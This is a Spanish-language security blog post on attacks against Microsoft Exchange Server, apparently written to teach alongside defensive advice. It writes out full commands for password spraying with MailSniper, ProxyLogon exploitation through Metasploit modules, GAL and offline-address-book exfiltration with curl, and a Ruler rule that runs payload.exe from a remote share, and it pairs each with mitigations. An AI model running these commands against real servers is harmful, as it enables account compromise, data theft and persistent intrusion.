Jul 18 2024
0

Ataques al servidor de Exchange

Microsoft Exchange Server es un componente crítico en muchas infraestructuras empresariales, ya que maneja la comunicación por correo electrónico y otros servicios de colaboración. Debido a su importancia y su estrecha integración con Active Directory, Exchange es un objetivo valioso para los atacantes. A continuación, se detallan los principales ataques al servidor de Exchange, junto con ejemplos de explotación y medidas de mitigación.

1. Enumeración de usuarios y ataques de Password Spraying

La enumeración de usuarios y los ataques de password spraying son técnicas comunes utilizadas para obtener credenciales válidas. Los atacantes pueden utilizar herramientas como MailSniper para realizar estas actividades.

Ejemplo de explotación:

  1. Enumeración de usuarios:

    Invoke-DomainHarvestOWA -ExchHostname 192.168.56.106

    Este comando identifica el nombre de dominio completo (FQDN) del servidor de correo.

  2. Enumeración de nombres de usuario:

    Invoke-UsernameHarvestOWA -UserList .\user.txt -ExchHostname 192.168.56.106 -Domain windomain.local -OutFile found.txt

    Este comando utiliza una lista de nombres de usuario para identificar cuáles son válidos.

  3. Ataque de password spraying:

    Invoke-PasswordSprayOWA -ExchHostname 192.168.56.106 -UserList .\found.txt -Password Qwerty123! -OutFile creds.txt

    Este comando intenta una contraseña común contra todos los usuarios válidos identificados.

Medidas de mitigación:

  • Implementar autenticación multifactor (MFA).
  • Monitorear los intentos de inicio de sesión fallidos.
  • Aplicar políticas de bloqueo de cuentas después de múltiples intentos fallidos.

2. Explotación de vulnerabilidades conocidas

Exchange Server ha sido objeto de varias vulnerabilidades críticas que permiten la ejecución remota de código (RCE). Algunas de las más conocidas incluyen ProxyLogon, ProxyShell y ProxyNotShell.

Ejemplo de explotación: ProxyLogon

  1. Verificación de vulnerabilidad:

    auxiliary/scanner/http/exchange_proxylogon

    Utilizando Metasploit, este módulo escanea el servidor Exchange para determinar si es vulnerable a ProxyLogon.

  2. Explotación de ProxyLogon:

    exploit/windows/http/exchange_proxylogon_rce

    Este módulo de Metasploit explota la vulnerabilidad para ejecutar código de forma remota en el servidor Exchange.

Medidas de mitigación:

  • Aplicar los parches de seguridad proporcionados por Microsoft.
  • Monitorear el tráfico de red en busca de comportamientos anómalos.
  • Implementar políticas de segmentación de red para limitar el acceso a los servidores de Exchange.

3. Exfiltración de datos

Una vez que un atacante ha obtenido acceso a un servidor Exchange, puede exfiltrar datos sensibles, como listas de direcciones globales (GAL) y otros correos electrónicos.

Ejemplo de explotación:

  1. Extracción de la GAL:

    Get-GlobalAddressList -ExchHostname 192.168.56.106 -UserName windomain.local\vinegrep -Password Qwerty123! -OutFile gal.txt

    Este comando utiliza MailSniper para extraer la lista global de direcciones de Exchange.

  2. Descarga de la Libreta de Direcciones Offline (OAB):

    curl -k --ntlm -u 'windomain.local\vinegrep:Qwerty123!' https://exchange.windomain.local/OAB/e79472bb-2dd6-4ffb-9e02-8dd42510bb1b/oab.xml > oab.xml

    Este comando descarga el archivo OAB, que contiene direcciones de correo electrónico.

Medidas de mitigación:

  • Implementar políticas de acceso basadas en roles (RBAC) para limitar el acceso a información sensible.
  • Monitorear y auditar el acceso a datos críticos.
  • Utilizar herramientas de detección de intrusiones (IDS) para identificar y responder a actividades sospechosas.

4. Persistencia y movimiento lateral

Los atacantes pueden establecer mecanismos de persistencia en el servidor Exchange y utilizarlo como punto de partida para moverse lateralmente dentro de la red.

Ejemplo de explotación:

  1. Creación de una regla maliciosa en Outlook: 
    ./ruler -u vinegrep -p 'Qwerty123!' -d windomain.local -e [email protected] -k --url https://192.168.56.106/autodiscover/autodiscover.xml --verbose --debug add --trigger "vinegrep" --name evil --location \\192.168.56.100:8000\payload.exe --send

    Utilizando la herramienta Ruler, se crea una regla maliciosa que ejecuta un payload desde una ubicación remota.

Medidas de mitigación:

  • Revisar y auditar regularmente las reglas de correo electrónico y las configuraciones de Outlook.
  • Implementar políticas de seguridad estrictas para la creación y modificación de reglas de correo.
  • Monitorear el tráfico de red en busca de conexiones inusuales o no autorizadas.

Conclusión

Los servidores de Exchange son objetivos valiosos para los atacantes debido a su integración con Active Directory y su rol crítico en la infraestructura de TI. Es esencial implementar medidas de seguridad robustas, mantener los sistemas actualizados y monitorear continuamente las actividades sospechosas para proteger estos sistemas críticos.

Publicado enBlog
EtiquetasDirectorio Activo Políticas de seguridad estrictas Segmentación de red

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *